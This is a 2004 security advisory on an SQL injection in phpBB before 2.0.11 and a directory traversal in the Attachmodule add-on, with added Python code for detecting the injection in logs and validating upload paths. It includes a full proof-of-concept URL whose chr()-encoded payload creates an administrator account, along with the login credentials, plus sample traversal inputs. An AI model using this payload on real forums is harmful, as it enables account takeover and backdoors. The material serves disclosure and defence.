[UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal

Subject: [UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal
Date: 29 Nov 2004 10:54:57 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  phpBB SQL Injection and Attachmodule Add-On Directory Traversal
------------------------------------------------------------------------


SUMMARY

 <http://www.phpbb.com/> phpBB is "a high powered, fully scalable, and 
highly customizable open-source bulletin board package. phpBB has a 
user-friendly interface, simple and straightforward administration panel, 
and helpful FAQ. Based on the powerful PHP server language and your choice 
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the 
ideal free community solution for all web sites."

An SQL injection vulnerability exists in phpBB, and a directory traversal 
vulnerability exists in the code of the Attachmodule add-on.

DETAILS

Vulnerable Systems:
 * phpBB versions prior to 2.0.11
 * Attachmodule, all versions

Immune Systems:
 * phpBB version 2.0.11

Because the input request is decoded incorrectly, a malicious attacker is 
able to inject any type of SQL query into the back-end database server. Upon 
close inspection of the code it became evident that using multiple chr() 
calls will fool phpBB and allow insertion of an SQL query.

The following SQL statement will add a user with administrative rights on 
the system:
INSERT INTO phpbb_users(user_id, user_active, username, user_password, 
user_level) VALUES ('99999', '1', 'ze3lock', 
'ba3c83348bddf7b368b478ac06d3340e', '1')

And the following login credentials:
username: ze3lock
pass: thepass

Note: This query assumes that the phpBB user table is called 
'phpbb_users', which is the case for most sites using phpBB. Sites on 
which the table name was changed will not be affected by this query; the 
correct name of the table would have to be discovered before exploitation 
could take place.

The exploit can be run on any site using phpBB without the need to be 
registered. This makes it a prime target for automated scripts that insert 
backdoors in many sites around the web. A proof of concept HTTP query is 
provided below. In order to make it work, an active thread number from the 
forums must be substituted in, but this is relatively trivial to find.

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)
%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)
%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)
%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)
%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)
%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)
%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)
%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)
%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)
%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)
%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)
%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)
%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)
%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527
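As an added example (not part of the advisory), the following Python script shows how a defender can pick the pattern above out of web-server access logs. It extracts the highlight parameter from each request line, decodes it twice (the advisory's payload is double-encoded: %2527 becomes %27 and then a single quote, %252e becomes a period), and flags three indicators of the breakout shape used in the proof of concept: a double-encoded value, a quote immediately concatenated to a function call, and a run of chr() calls. The log lines, client addresses, timestamps and the shortened payload are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format). The second
# line carries a shortened version of the advisory's double-encoded highlight
# payload (%2527 -> %27 -> ', %252e -> %2e -> .); the others are benign.
# IPs, timestamps and response sizes are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2004:10:54:57 +0200] "GET /forum/viewtopic.php?t=30&highlight=mysql HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [29/Nov/2004:10:55:02 +0200] "GET /forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(83)%252echr(69)%252echr(76)%252echr(69)%252echr(67)%252echr(84))%252e%2527 HTTP/1.1" 200 5120 "-" "-"
10.0.0.7 - - [29/Nov/2004:10:56:10 +0200] "GET /forum/viewtopic.php?t=12&highlight=don%27t HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
10.0.0.7 - - [29/Nov/2004:10:56:11 +0200] "GET /forum/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
CHR_CALL_RE = re.compile(r"chr\(\d+\)", re.IGNORECASE)
# A quote immediately concatenated to a function call: the breakout shape
# the advisory's proof of concept uses ('.mysql_query(...).').
BREAKOUT_RE = re.compile(r"'\s*\.\s*\w+\s*\(")


def decode_highlight(target):
    """Return the highlight parameter decoded once and twice, or None if absent.

    parse_qsl performs the first decode (what the web server/PHP sees);
    unquote performs the second, mirroring the extra decode the advisory
    describes as mishandled.
    """
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    if "highlight" not in params:
        return None
    once = params["highlight"]
    return once, unquote(once)


def classify_highlight(target):
    """List the reasons a request looks like the advisory's injection; [] if clean."""
    decoded = decode_highlight(target)
    if decoded is None:
        return []
    once, twice = decoded
    reasons = []
    if "%" in once and twice != once:
        reasons.append("double-encoded value")
    if BREAKOUT_RE.search(twice):
        reasons.append("quote followed by function call")
    chr_calls = len(CHR_CALL_RE.findall(twice))
    if chr_calls >= 3:
        reasons.append(f"{chr_calls} chr() calls")
    return reasons


def scan_log(text):
    """Return (client_ip, request_target, reasons) for every flagged log line."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = classify_highlight(match.group("target"))
        if reasons:
            hits.append((line.split(" ", 1)[0], match.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {target[:60]}... -> {', '.join(reasons)}")
```

Only the second line is reported. A legitimate search term containing an apostrophe (the third line) is not flagged, because the rule looks for the double-decoding breakout rather than for quotes in general; a broader quote-based rule would catch other probing but also ordinary searches.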

In addition, a directory traversal bug in the Attachmodule allows the user 
to read any file located on the local filesystem of the server running 
phpBB. The main culprit is the 'UPLOAD_DIR' argument, which is not properly 
sanitized. This argument names the directory into which all files are 
uploaded, and the system accepts any type of character as input. An 
attacker is thus able to overwrite files on the local filesystem of the 
server.

Vendor Status:
Users of this system are highly encouraged to upgrade to version 2.0.11 and 
add input validation to the 'UPLOAD_DIR' argument of Attachmodule.
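As an added example of the input validation recommended above for the 'UPLOAD_DIR' argument (this is illustrative Python, not the Attachmodule's own PHP code, which the advisory does not show), the check below accepts only a plain directory name and then verifies that the canonical path still lies under the configured base directory. The naive_join helper exists only for contrast: it shows that an unchecked os.path.join discards the base when handed an absolute path and that '..' components walk out of it. The base directory and candidate values are constructed for the example.

```python
import os
import re

# Allowlist for an upload-directory setting: a single plain directory name.
# Separators, traversal components, NUL bytes and absolute paths cannot pass.
DIR_NAME_RE = re.compile(r"[A-Za-z0-9_\-]{1,64}")


def naive_join(base_dir, requested):
    """What happens with no validation at all (shown for contrast only):
    os.path.join drops base_dir when `requested` is absolute, and normpath
    folds '..' components into a path outside the base."""
    return os.path.normpath(os.path.join(base_dir, requested))


def safe_upload_dir(base_dir, requested):
    """Return the canonical upload directory for `requested`, or None.

    Two independent checks: the allowlist rejects anything that is not a
    plain name, and the canonical-path containment check protects the base
    directory even if the allowlist is later loosened (e.g. to permit
    subdirectories). realpath also resolves symlinks, so a link planted
    inside the base cannot redirect uploads elsewhere.
    """
    if not DIR_NAME_RE.fullmatch(requested):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed values an administrator (or anyone able to supply the argument)
# might pass as UPLOAD_DIR.
CANDIDATES = ["attachments", "files_2004", "../../etc", "/etc", "sub/dir",
              "x\x00y", "..", "."]


def evaluate_candidates(base_dir, candidates=CANDIDATES):
    """Map each candidate setting to True (accepted) or False (rejected)."""
    return {c: safe_upload_dir(base_dir, c) is not None for c in candidates}


if __name__ == "__main__":
    base = "/srv/phpbb/files"  # hypothetical forum install path
    for name, ok in evaluate_candidates(base).items():
        verdict = "accepted" if ok else "rejected"
        print(f"{name!r:14} {verdict:9} naive join -> {naive_join(base, name)}")
```

Run stand-alone it prints one line per candidate; only the two plain names are accepted, while the naive join column shows '/etc' and '/srv/etc' for the traversal inputs, which is exactly the outcome the containment check prevents.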


ADDITIONAL INFORMATION

The information has been provided by Zeelock <mailto:zee@psybnc.it>.


